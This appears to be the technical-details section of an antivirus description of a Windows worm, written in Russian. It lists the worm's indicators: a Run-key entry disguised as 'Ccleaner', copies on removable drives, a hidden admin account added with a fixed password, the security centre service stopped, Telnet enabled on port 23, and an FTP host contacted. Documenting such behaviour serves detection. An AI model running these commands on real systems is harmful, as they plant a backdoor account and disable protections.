Техническая информация
- [<HKLM>\SOFTWARE\Microsoft\Windows\CurrentVersion\Run] 'Ccleaner' = 'C:\dir\windows\Proteger.exe'
- [<HKLM>\SYSTEM\ControlSet001\Services\TlntSvr] 'Start' = '00000002'
- <Имя диска съемного носителя>:\fotos.exe
- <SYSTEM32>\net1.exe user admin hackers5191 /add
- <SYSTEM32>\ipconfig.exe
- <SYSTEM32>\net1.exe stop "Centro de Seguridad"
- <SYSTEM32>\net1.exe localgroup "Administradores" admin /add
- <SYSTEM32>\reg.exe ADD HKLM\SYSTEM\CurrentControlSet\Services\TlntSvr /v Start /t REG_DWORD /d 2 /f
- <SYSTEM32>\tlntadmn.exe config port = 23
- <SYSTEM32>\attrib.exe +a +h +s +r %username%
- <SYSTEM32>\reg.exe add HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run /v Ccleaner /d C:\dir\windows\Proteger.exe /f
- <SYSTEM32>\net.exe stop "Centro de Seguridad"
- <Текущая директория>\%USERNAME%
- C:\fotos.exe
- C:\dir\windows\Proteger.exe
- 'ft#.##bcindario.com':21
- DNS ASK ft#.##bcindario.com
- '<IP-адрес в локальной сети>':1035